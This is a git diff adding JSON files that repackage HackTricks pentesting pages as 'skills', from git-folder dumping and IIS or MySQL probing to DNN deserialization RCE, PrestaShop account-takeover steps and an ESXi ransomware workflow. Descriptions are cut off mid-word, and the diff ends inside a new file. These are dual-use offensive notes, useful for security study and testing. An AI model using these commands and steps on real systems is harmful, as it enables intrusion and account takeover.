\ No newline at end of file
diff --git a/skills/network_services_pentesting_959540fbcfa3.json b/skills/network_services_pentesting_959540fbcfa3.json
new file mode 100644
index 0000000..10c68fa
--- /dev/null
+++ b/skills/network_services_pentesting_959540fbcfa3.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_959540fbcfa3",
+ "category": "network-services-pentesting",
+ "title": "git",
+ "description": "# Git\n\n{{#include ../../banners/hacktricks-training.md}}\n\n**To dump a .git folder from a URL use** [**https://github.com/arthaud/git-dumper**](https://github.com/arthaud/git-dumper)\n\n**Use** [**https://www.gitkraken.com/**](https://www.gitkraken.com/) **to inspect the content**\n\nIf a _.git_ directory is found in a web application you can download all the content using _wget -r http://web.com/.git._ Then, you can see the changes made by using _git diff_.\n\nThe tools: [Git-Money](https://github.com",
+ "payloads": [
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "**To dump a .git folder from a URL use** [**https://github.com/arthaud/git-dumper**](https://github.com/arthaud/git-dumper)",
+ "**Use** [**https://www.gitkraken.com/**](https://www.gitkraken.com/) **to inspect the content**",
+ "If a _.git_ directory is found in a web application you can download all the content using _wget -r http://web.com/.git._ Then, you can see the changes made by using _git diff_.",
+ "The tools: [Git-Money](https://github.com/dnoiz1/git-money), [DVCS-Pillage](https://github.com/evilpacket/DVCS-Pillage) and [GitTools](https://github.com/internetwache/GitTools) can be used to retrieve the content of a git directory.",
+ "The tool [https://github.com/cve-search/git-vuln-finder](https://github.com/cve-search/git-vuln-finder) can be used to search for CVEs and security vulnerability messages inside commits messages.",
+ "The tool [https://github.com/michenriksen/gitrob](https://github.com/michenriksen/gitrob) search for sensitive data in the repositories of an organisations and its employees.",
+ "[Repo security scanner](https://github.com/UKHomeOffice/repo-security-scanner) is a command line-based tool that was written with a single goal: to help you discover GitHub secrets that developers accidentally made by pushing sensitive data. And like the others, it will help you find passwords, private keys, usernames, tokens and more.",
+ "Here you can find an study about github dorks: [https://securitytrails.com/blog/github-dorks](https://securitytrails.com/blog/github-dorks)",
+ "### Faster /.git dumping & dirlisting bypass (2024\u20132026)",
+ "* [holly-hacker/git-dumper](https://github.com/holly-hacker/git-dumper) is a 2024 rewrite of the classic GitTools dumper with parallel fetching (>10x speedup). Example: `python3 git-dumper.py https://victim/.git/ out && cd out && git checkout -- .`",
+ "* [Ebryx/GitDump](https://github.com/Ebryx/GitDump) brute-forces object names from `.git/index`, `packed-refs`, etc. to recover repos even when directory traversal is disabled: `python3 git-dump.py https://victim/.git/ dump && cd dump && git checkout -- .`",
+ "### Quick post-dump triage",
+ "```bash",
+ "cd dumpdir"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/git.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_95c997cd935e.json b/skills/network_services_pentesting_95c997cd935e.json
new file mode 100644
index 0000000..90e342a
--- /dev/null
+++ b/skills/network_services_pentesting_95c997cd935e.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_95c997cd935e",
+ "category": "network-services-pentesting",
+ "title": "iis internet information services",
+ "description": "# IIS - Internet Information Services\n\n{{#include ../../banners/hacktricks-training.md}}\n\nTest executable file extensions:\n\n- asp\n- aspx\n- config\n- php\n\n## Internal IP Address disclosure\n\nOn any IIS server where you get a 302 you can try stripping the Host header and using HTTP/1.0 and inside the response the Location header could point you to the internal IP address:\n\n```\nnc -v domain.com 80\nopenssl s_client -connect domain.com:443\n```\n\nResponse disclosing the internal IP:\n\n```\nGET / HTTP/1.0\n\n",
+ "payloads": [
+ "# IIS - Internet Information Services",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "Test executable file extensions:",
+ "- aspx",
+ "- config",
+ "## Internal IP Address disclosure",
+ "On any IIS server where you get a 302 you can try stripping the Host header and using HTTP/1.0 and inside the response the Location header could point you to the internal IP address:",
+ "nc -v domain.com 80",
+ "openssl s_client -connect domain.com:443",
+ "Response disclosing the internal IP:",
+ "GET / HTTP/1.0",
+ "HTTP/1.1 302 Moved Temporarily",
+ "Cache-Control: no-cache",
+ "Pragma: no-cache",
+ "Location: https://192.168.5.237/owa/"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_95ea1f458180.json b/skills/network_services_pentesting_95ea1f458180.json
new file mode 100644
index 0000000..a4813be
--- /dev/null
+++ b/skills/network_services_pentesting_95ea1f458180.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_95ea1f458180",
+ "category": "network-services-pentesting",
+ "title": "pentesting mysql",
+ "description": "# 3306 - Pentesting Mysql\n\n{{#include ../banners/hacktricks-training.md}}\n\n## **Basic Information**\n\n**MySQL** can be described as an open source **Relational Database Management System (RDBMS)** that is available at no cost. It operates on the **Structured Query Language (SQL)**, enabling the management and manipulation of databases.\n\n**Default port:** 3306\n\n```\n3306/tcp open mysql\n```\n\n## **Connect**\n\n### **Local**\n\n```bash\nmysql -u root # Connect to root without password\nmysql -u root -p # A",
+ "payloads": [
+ "# 3306 - Pentesting Mysql",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## **Basic Information**",
+ "**MySQL** can be described as an open source **Relational Database Management System (RDBMS)** that is available at no cost. It operates on the **Structured Query Language (SQL)**, enabling the management and manipulation of databases.",
+ "**Default port:** 3306",
+ "3306/tcp open mysql",
+ "## **Connect**",
+ "### **Local**",
+ "```bash",
+ "mysql -u root # Connect to root without password",
+ "mysql -u root -p # A password will be asked (check someone)",
+ "### Remote",
+ "```bash",
+ "mysql -h -u root",
+ "mysql -h -u root@localhost"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-mysql.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_961be3bd2ef6.json b/skills/network_services_pentesting_961be3bd2ef6.json
new file mode 100644
index 0000000..722aba8
--- /dev/null
+++ b/skills/network_services_pentesting_961be3bd2ef6.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_961be3bd2ef6",
+ "category": "network-services-pentesting",
+ "title": "disable functions bypass php perl extension safe mode bypass exploit",
+ "description": "# PHP Perl Extension Safe_mode Bypass Exploit\n\n{{#include ../../../../banners/hacktricks-training.md}}\n\n## Background\n\nThe issue tracked as **CVE-2007-4596** comes from the legacy `perl` PHP extension, which embeds a full Perl interpreter without honoring PHP's `safe_mode`, `disable_functions`, or `open_basedir` controls. Any PHP worker that loads `extension=perl.so` gains unrestricted Perl `eval`, so command execution remains trivial even when all classic PHP process-spawning primitives are blo",
+ "payloads": [
+ "# PHP Perl Extension Safe_mode Bypass Exploit",
+ "{{#include ../../../../banners/hacktricks-training.md}}",
+ "## Background",
+ "The issue tracked as **CVE-2007-4596** comes from the legacy `perl` PHP extension, which embeds a full Perl interpreter without honoring PHP's `safe_mode`, `disable_functions`, or `open_basedir` controls. Any PHP worker that loads `extension=perl.so` gains unrestricted Perl `eval`, so command execution remains trivial even when all classic PHP process-spawning primitives are blocked. Although `safe_mode` disappeared in PHP 5.4, many outdated shared-hosting stacks and vulnerable labs still ship it, so this bypass is still valuable when you land on legacy control panels.",
+ "## Compatibility & Packaging Status (2025)",
+ "* The last PECL release (`perl-1.0.1`, 2013) targets PHP \u22655.0; PHP 8+ generally fails because the Zend APIs changed.",
+ "* PECL is being superseded by PIE, but older stacks still ship PECL/pear. Use the flow below on PHP 5/7 targets; on newer PHP expect to downgrade or switch to another injection path (e.g., userland FFI).",
+ "## Building a Testable Environment in 2025",
+ "* Fetch `perl-1.0.1` from PECL, compile it for the PHP branch you plan to attack, and load it globally (`php.ini`) or via `dl()` (if permitted).",
+ "* Quick Debian-based lab recipe:",
+ "```bash",
+ "sudo apt install php5.6 php5.6-dev php-pear build-essential",
+ "sudo pecl install perl-1.0.1",
+ "echo \"extension=perl.so\" | sudo tee /etc/php/5.6/mods-available/perl.ini",
+ "sudo phpenmod perl && sudo systemctl restart apache2"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_9683ace9ccb2.json b/skills/network_services_pentesting_9683ace9ccb2.json
new file mode 100644
index 0000000..1995fc2
--- /dev/null
+++ b/skills/network_services_pentesting_9683ace9ccb2.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_9683ace9ccb2",
+ "category": "network-services-pentesting",
+ "title": "vmware esx vcenter...",
+ "description": "# VMware ESX / vCenter Pentesting\n\n{{#include ../../banners/hacktricks-training.md}}\n\n\n## Enumeration\n\n```bash\nnmap -sV --script \"http-vmware-path-vuln or vmware-version\" -p \nmsf> use auxiliary/scanner/vmware/esx_fingerprint\nmsf> use auxiliary/scanner/http/ms15_034_http_sys_memory_dump\n```\n\n## Bruteforce\n\n```bash\nmsf> auxiliary/scanner/vmware/vmware_http_login\n```\n\nIf you find valid credentials, you can use more metasploit scanner modules to obtain information.\n\n## ESXi Post-Exploitat",
+ "payloads": [
+ "# VMware ESX / vCenter Pentesting",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Enumeration",
+ "```bash",
+ "nmap -sV --script \"http-vmware-path-vuln or vmware-version\" -p ",
+ "msf> use auxiliary/scanner/vmware/esx_fingerprint",
+ "msf> use auxiliary/scanner/http/ms15_034_http_sys_memory_dump",
+ "## Bruteforce",
+ "```bash",
+ "msf> auxiliary/scanner/vmware/vmware_http_login",
+ "If you find valid credentials, you can use more metasploit scanner modules to obtain information.",
+ "## ESXi Post-Exploitation & Ransomware Operations",
+ "### Attack Workflow inside Virtual Estates",
+ "* **Develop**: maintain a lightweight management agent (e.g., *MrAgent*), encryptor (e.g., *Mario*), and leak infrastructure.",
+ "* **Infiltrate**: compromise vSphere management, enumerate hosts, steal data, and stage payloads."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_97f79ab3bd9b.json b/skills/network_services_pentesting_97f79ab3bd9b.json
new file mode 100644
index 0000000..b57f4d9
--- /dev/null
+++ b/skills/network_services_pentesting_97f79ab3bd9b.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_97f79ab3bd9b",
+ "category": "network-services-pentesting",
+ "title": "dotnetnuke dnn",
+ "description": "# DotNetNuke (DNN)\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## DotNetNuke (DNN)\n\nIf you enter as **administrator** in DNN it's easy to obtain **RCE**, however a number of *unauthenticated* and *post-auth* techniques have been published in the last few years. The following cheat-sheet collects the most useful primitives for both offensive and defensive work.\n\n---\n## Version & Environment Enumeration\n\n* Check the *X-DNN* HTTP response header \u2013 it usually discloses the exact platform ve",
+ "payloads": [
+ "# DotNetNuke (DNN)",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## DotNetNuke (DNN)",
+ "If you enter as **administrator** in DNN it's easy to obtain **RCE**, however a number of *unauthenticated* and *post-auth* techniques have been published in the last few years. The following cheat-sheet collects the most useful primitives for both offensive and defensive work.",
+ "## Version & Environment Enumeration",
+ "* Check the *X-DNN* HTTP response header \u2013 it usually discloses the exact platform version.",
+ "* The installation wizard leaks the version in `/Install/Install.aspx?mode=install` (accessible on very old installs).",
+ "* `/API/PersonaBar/GetStatus` (9.x) returns a JSON blob containing `\"dnnVersion\"` for low-privilege users.",
+ "* Typical cookies you will see on a live instance:",
+ "* `.DOTNETNUKE` \u2013 ASP.NET forms authentication ticket.",
+ "* `DNNPersonalization` \u2013 contains XML/serialized user profile data (old versions \u2013 see RCE below).",
+ "## Unauthenticated Exploitation",
+ "### 1. Cookie Deserialization RCE (CVE-2017-9822 & follow-ups)",
+ "*Affected versions \u2264 9.3.0-RC*",
+ "`DNNPersonalization` is deserialized on every request when the built-in 404 handler is enabled. Crafted XML can therefore lead to arbitrary gadget chains and code execution."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_9b3f90456562.json b/skills/network_services_pentesting_9b3f90456562.json
new file mode 100644
index 0000000..b973ab8
--- /dev/null
+++ b/skills/network_services_pentesting_9b3f90456562.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_9b3f90456562",
+ "category": "network-services-pentesting",
+ "title": "137 138 139 pentesting netbios",
+ "description": "# 137,138,139 - Pentesting NetBios\n\n{{#include ../banners/hacktricks-training.md}}\n\n## NetBios Name Service\n\n**NetBIOS Name Service** plays a crucial role, involving various services such as **name registration and resolution**, **datagram distribution**, and **session services**, utilizing specific ports for each service.\n\n[From Wikidepia](https://en.wikipedia.org/wiki/NetBIOS_over_TCP/IP):\n\n- Name service for name registration and resolution (ports: 137/udp and 137/tcp).\n- Datagram distributio",
+ "payloads": [
+ "# 137,138,139 - Pentesting NetBios",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## NetBios Name Service",
+ "**NetBIOS Name Service** plays a crucial role, involving various services such as **name registration and resolution**, **datagram distribution**, and **session services**, utilizing specific ports for each service.",
+ "[From Wikidepia](https://en.wikipedia.org/wiki/NetBIOS_over_TCP/IP):",
+ "- Name service for name registration and resolution (ports: 137/udp and 137/tcp).",
+ "- Datagram distribution service for connectionless communication (port: 138/udp).",
+ "- Session service for connection-oriented communication (port: 139/tcp).",
+ "### Name Service",
+ "For a device to participate in a NetBIOS network, it must have a unique name. This is achieved through a **broadcast process** where a \"Name Query\" packet is sent. If no objections are received, the name is considered available. Alternatively, a **Name Service server** can be queried directly to check for name availability or to resolve a name to an IP address. Tools like `nmblookup`, `nbtscan`, and `nmap` are utilized for enumerating NetBIOS services, revealing server names and MAC addresses.",
+ "```bash",
+ "PORT STATE SERVICE VERSION",
+ "137/udp open netbios-ns Samba nmbd netbios-ns (workgroup: WORKGROUP)",
+ "Enumerating a NetBIOS service you can obtain the names the server is using and the MAC address of the server.",
+ "```bash"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/137-138-139-pentesting-netbios.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_9dce36819734.json b/skills/network_services_pentesting_9dce36819734.json
new file mode 100644
index 0000000..8d3bca0
--- /dev/null
+++ b/skills/network_services_pentesting_9dce36819734.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_9dce36819734",
+ "category": "network-services-pentesting",
+ "title": "3128 pentesting squid",
+ "description": "# 3128/tcp - Pentesting Squid\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\nFrom [Wikipedia]():\n\n> **Squid** is a caching and forwarding HTTP web proxy. It has a wide variety of uses, including speeding up a web server by caching repeated requests, caching web, DNS and other computer network lookups for a group of people sharing network resources, and aiding security by filtering traffic. Although primarily used for HTTP an",
+ "payloads": [
+ "# 3128/tcp - Pentesting Squid",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "From [Wikipedia]():",
+ "> **Squid** is a caching and forwarding HTTP web proxy. It has a wide variety of uses, including speeding up a web server by caching repeated requests, caching web, DNS and other computer network lookups for a group of people sharing network resources, and aiding security by filtering traffic. Although primarily used for HTTP and FTP, Squid includes limited support for several other protocols including Internet Gopher, SSL, TLS and HTTPS. Squid does not support the SOCKS protocol, unlike Privoxy, with which Squid can be used in order to provide SOCKS support.",
+ "**Default port:** 3128",
+ "PORT STATE SERVICE VERSION",
+ "3128/tcp open http-proxy Squid http proxy 4.11",
+ "## Enumeration",
+ "### Web Proxy",
+ "You can try to set this discovered service as proxy in your browser. However, if it's configured with HTTP authentication you will be prompted for usernames and password.",
+ "```bash",
+ "# Try to proxify curl",
+ "curl --proxy http://10.10.11.131:3128 http://10.10.11.131",
+ "### Nmap proxified"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/3128-pentesting-squid.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_9e0bf352749a.json b/skills/network_services_pentesting_9e0bf352749a.json
new file mode 100644
index 0000000..43d2f45
--- /dev/null
+++ b/skills/network_services_pentesting_9e0bf352749a.json
@@ -0,0 +1,24 @@
+{
+ "id": "network_services_pentesting_9e0bf352749a",
+ "category": "network-services-pentesting",
+ "title": "50030 50060 50070 50075 50090 pentesting hadoop",
+ "description": "# 50030-50060-50070-50075-50090 - Pentesting Hadoop\n\n{{#include ../banners/hacktricks-training.md}}\n\n## **Basic Information**\n\n**Apache Hadoop** is an **open-source framework** for **distributed storage and processing** of **large datasets** across **computer clusters**. It uses **HDFS** for storage and **MapReduce** for processing.\n\nUnfortunatelly Hadoop lacks support in the Metasploit framework at the time of documentation. However, you can use the following **Nmap scripts** to enumerate Hadoo",
+ "payloads": [
+ "# 50030-50060-50070-50075-50090 - Pentesting Hadoop",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## **Basic Information**",
+ "**Apache Hadoop** is an **open-source framework** for **distributed storage and processing** of **large datasets** across **computer clusters**. It uses **HDFS** for storage and **MapReduce** for processing.",
+ "Unfortunatelly Hadoop lacks support in the Metasploit framework at the time of documentation. However, you can use the following **Nmap scripts** to enumerate Hadoop services:",
+ "- **`hadoop-jobtracker-info (Port 50030)`**",
+ "- **`hadoop-tasktracker-info (Port 50060)`**",
+ "- **`hadoop-namenode-info (Port 50070)`**",
+ "- **`hadoop-datanode-info (Port 50075)`**",
+ "- **`hadoop-secondary-namenode-info (Port 50090)`**",
+ "It's crucial to note that **Hadoop operates without authentication in its default setup**. However, for enhanced security, configurations are available to integrate Kerberos with HDFS, YARN, and MapReduce services.",
+ "{{#include ../banners/hacktricks-training.md}}"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_a2b1f36b95a2.json b/skills/network_services_pentesting_a2b1f36b95a2.json
new file mode 100644
index 0000000..5b65d04
--- /dev/null
+++ b/skills/network_services_pentesting_a2b1f36b95a2.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_a2b1f36b95a2",
+ "category": "network-services-pentesting",
+ "title": "prestashop",
+ "description": "# PrestaShop\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## From XSS to RCE\n\n- [**PrestaXSRF**](https://github.com/nowak0x01/PrestaXSRF): PrestaShop Exploitation Script that elevate **XSS to RCE or Others Critical Vulnerabilities.** For more info check [**this post**](https://nowak0x01.github.io/papers/76bc0832a8f682a7e0ed921627f85d1d.html). It provides **support for PrestaShop Versions 8.X.X and 1.7.X.X, and allows to:**\n - _**(RCE) PSUploadModule(); - Upload a custom Module:**_ Upload",
+ "payloads": [
+ "# PrestaShop",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## From XSS to RCE",
+ "- [**PrestaXSRF**](https://github.com/nowak0x01/PrestaXSRF): PrestaShop Exploitation Script that elevate **XSS to RCE or Others Critical Vulnerabilities.** For more info check [**this post**](https://nowak0x01.github.io/papers/76bc0832a8f682a7e0ed921627f85d1d.html). It provides **support for PrestaShop Versions 8.X.X and 1.7.X.X, and allows to:**",
+ "- _**(RCE) PSUploadModule(); - Upload a custom Module:**_ Upload a Persistent Module (backdoor) to PrestaShop.",
+ "## ps_checkout ExpressCheckout silent login account takeover (CVE-2025-61922)",
+ "> Missing identity validation in the `ps_checkout` module `< 5.0.5` lets an unauthenticated attacker **switch the session to any customer by supplying their email**.",
+ "- **Endpoint (unauth):** `POST /module/ps_checkout/ExpressCheckout`.",
+ "- **Flow:** `ExpressCheckout.php` accepts attacker JSON, only checks `orderID`, builds `ExpressCheckoutRequest` and calls `ExpressCheckoutAction::execute()`.",
+ "- **Auth bug:** In vulnerable versions `ExpressCheckoutAction` calls `CustomerAuthenticationAction::execute()` when no user is logged in. That method simply does `customerExists()` and `context->updateCustomer(new Customer($id))`, so **email existence == login** (no password/token check).",
+ "- **Attacker-controlled email field:** `order.payer.email_address` inside the JSON payload is read by `ExpressCheckoutRequest::getPayerEmail()`.",
+ "### Exploitation steps",
+ "1. Collect any registered customer email (admin is separate and not affected by this flow).",
+ "2. Send an unauthenticated POST to the controller with `orderID` plus the victim email in `order.payer.email_address`.",
+ "3. Even if the endpoint returns `500`, the response will include cookies for the victim\u2019s customer context (session already switched), enabling PII access or purchasing with saved cards."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/prestashop.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_a4ae5e51fb25.json b/skills/network_services_pentesting_a4ae5e51fb25.json
new file mode 100644
index 0000000..99c784a
--- /dev/null
+++ b/skills/network_services_pentesting_a4ae5e51fb25.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_a4ae5e51fb25",
+ "category": "network-services-pentesting",
+ "title": "pentesting vnc",
+ "description": "# 5800,5801,5900,5901 - Pentesting VNC\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\n**Virtual Network Computing (VNC)** is a robust graphical desktop-sharing system that utilizes the **Remote Frame Buffer (RFB)** protocol to enable remote control and collaboration with another computer. With VNC, users can seamlessly interact with a remote computer by transmitting keyboard and mouse events bidirectionally. This allows for real-time access and facilitates efficient remot",
+ "payloads": [
+ "# 5800,5801,5900,5901 - Pentesting VNC",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "**Virtual Network Computing (VNC)** is a robust graphical desktop-sharing system that utilizes the **Remote Frame Buffer (RFB)** protocol to enable remote control and collaboration with another computer. With VNC, users can seamlessly interact with a remote computer by transmitting keyboard and mouse events bidirectionally. This allows for real-time access and facilitates efficient remote assistance or collaboration over a network.",
+ "VNC usually uses ports **5800 or 5801 or 5900 or 5901.**",
+ "PORT STATE SERVICE",
+ "5900/tcp open vnc",
+ "## Enumeration",
+ "```bash",
+ "nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p ",
+ "msf> use auxiliary/scanner/vnc/vnc_none_auth",
+ "### [**Brute force**](../generic-hacking/brute-force.md#vnc)",
+ "## Connect to vnc using Kali",
+ "```bash",
+ "vncviewer [-passwd passwd.txt] ::5901"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-vnc.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_a4b437dbe81f.json b/skills/network_services_pentesting_a4b437dbe81f.json
new file mode 100644
index 0000000..bae7504
--- /dev/null
+++ b/skills/network_services_pentesting_a4b437dbe81f.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_a4b437dbe81f",
+ "category": "network-services-pentesting",
+ "title": "ftp bounce attack",
+ "description": "# FTP Bounce attack - Scan\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## FTP Bounce - Scanning\n\n### Manual\n\n1. Connect to vulnerable FTP\n2. Use **`PORT`**or **`EPRT`**(but only 1 of them) to make it establish a connection with the _\\_ you want to scan:\n\n `PORT 172,32,80,80,0,8080`\\\n `EPRT |2|172.32.80.80|8080|`\n\n3. Use **`LIST`**(this will just send to the connected _\\_ the list of current files in the FTP folder) and check for the possible responses: `150 File sta",
+ "payloads": [
+ "# FTP Bounce attack - Scan",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## FTP Bounce - Scanning",
+ "### Manual",
+ "1. Connect to vulnerable FTP",
+ "2. Use **`PORT`**or **`EPRT`**(but only 1 of them) to make it establish a connection with the _\\_ you want to scan:",
+ "`PORT 172,32,80,80,0,8080`\\",
+ "`EPRT |2|172.32.80.80|8080|`",
+ "3. Use **`LIST`**(this will just send to the connected _\\_ the list of current files in the FTP folder) and check for the possible responses: `150 File status okay` (This means the port is open) or `425 No connection established` (This means the port is closed)",
+ "1. Instead of `LIST` you could also use **`RETR /file/in/ftp`** and look for similar `Open/Close` responses.",
+ "Example Using **PORT** (port 8080 of 172.32.80.80 is open and port 7777 is closed):",
+ ".png>)",
+ "Same example using **`EPRT`**(authentication omitted in the image):",
+ ".png>)",
+ "Open port using `EPRT` instead of `LIST` (different env)"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-ftp/ftp-bounce-attack.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_a4c63e1f9a43.json b/skills/network_services_pentesting_a4c63e1f9a43.json
new file mode 100644
index 0000000..f705e05
--- /dev/null
+++ b/skills/network_services_pentesting_a4c63e1f9a43.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_a4c63e1f9a43",
+ "category": "network-services-pentesting",
+ "title": "cassandra",
+ "description": "# 9042/9160 - Pentesting Cassandra\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\n**Apache Cassandra** is a **highly scalable**, **high-performance** distributed database designed to handle **large amounts of data** across many **commodity servers**, providing **high availability** with no **single point of failure**. It is a type of **NoSQL database**.\n\nIn several cases, you may find that Cassandra accepts **any credentials** (as there aren't any configured) and this cou",
+ "payloads": [
+ "# 9042/9160 - Pentesting Cassandra",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "**Apache Cassandra** is a **highly scalable**, **high-performance** distributed database designed to handle **large amounts of data** across many **commodity servers**, providing **high availability** with no **single point of failure**. It is a type of **NoSQL database**.",
+ "In several cases, you may find that Cassandra accepts **any credentials** (as there aren't any configured) and this could potentially allow an attacker to **enumerate** the database.",
+ "**Default port:** 9042,9160",
+ "PORT STATE SERVICE REASON",
+ "9042/tcp open cassandra-native Apache Cassandra 3.10 or later (native protocol versions 3/v3, 4/v4, 5/v5-beta)",
+ "9160/tcp open cassandra syn-ack",
+ "## Enumeration",
+ "### Manual",
+ "```bash",
+ "pip install cqlsh",
+ "cqlsh ",
+ "#Basic info enumeration"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/cassandra.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_a4cd74cb68f1.json b/skills/network_services_pentesting_a4cd74cb68f1.json
new file mode 100644
index 0000000..79843eb
--- /dev/null
+++ b/skills/network_services_pentesting_a4cd74cb68f1.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_a4cd74cb68f1",
+ "category": "network-services-pentesting",
+ "title": "32100 udp pentesting pppp cs2 p2p cameras",
+ "description": "# 32100/UDP - Pentesting PPPP (CS2) P2P Cameras\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Overview\n\nPPPP (a.k.a. \u201cP2P\u201d) is a proprietary device connectivity stack by CS2 Network that\u2019s widely embedded in low-cost IP cameras and other IoT devices. It provides rendezvous, NAT traversal (UDP hole punching), an application-layer \u201creliable\u201d stream on top of UDP, and an ID-based addressing scheme, allowing a mobile/desktop app to reach devices anywhere on the Internet by knowing only a devic",
+ "payloads": [
+ "# 32100/UDP - Pentesting PPPP (CS2) P2P Cameras",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Overview",
+ "PPPP (a.k.a. \u201cP2P\u201d) is a proprietary device connectivity stack by CS2 Network that\u2019s widely embedded in low-cost IP cameras and other IoT devices. It provides rendezvous, NAT traversal (UDP hole punching), an application-layer \u201creliable\u201d stream on top of UDP, and an ID-based addressing scheme, allowing a mobile/desktop app to reach devices anywhere on the Internet by knowing only a device ID.",
+ "Key traits relevant to attackers:",
+ "- Devices register to three vendor-operated rendezvous servers per ID prefix. Clients query the same servers to find the device\u2019s external/relay address, then attempt UDP hole punching. Relay fallback exists.",
+ "- Default server listener is reachable over UDP/32100. A minimal \u201chello\u201d probe is enough to fingerprint servers and some devices.",
+ "- Optional blanket cipher and a special \u201cCRCEnc\u201d mode exist but are weak by design and are typically disabled in popular ecosystems (e.g., LookCam).",
+ "- Control plane is usually JSON commands over the PPPP stream and commonly suffers from missing auth and memory-safety bugs.",
+ "Typical device ID format (LookCam family): PREFIX-######-CCCCC, shortened in apps (e.g., GHBB-000001-NRLXW \u2192 G000001NRLXW). Observed prefixes: BHCC (\"hekai\"), FHBB and GHBB (\"mykj\").",
+ "## Discovery and Enumeration",
+ "- Internet exposure: many PPPP super-nodes answer a 32100/UDP probe. Known plaintext and error-string responses make them easy to identify in traffic captures and with Internet scanners.",
+ "- LAN discovery: devices often reply to an unencrypted search on local broadcast. Use Paul Marrapese\u2019s script to enumerate:",
+ "- [https://github.com/pmarrapese/iot/tree/master/p2p/lansearch](https://github.com/pmarrapese/iot/tree/master/p2p/lansearch)",
+ "Notes:"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/32100-udp-pentesting-pppp-cs2-p2p-cameras.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_a5cab75c0ccc.json b/skills/network_services_pentesting_a5cab75c0ccc.json
new file mode 100644
index 0000000..f7dcc4d
--- /dev/null
+++ b/skills/network_services_pentesting_a5cab75c0ccc.json
@@ -0,0 +1,27 @@
+{
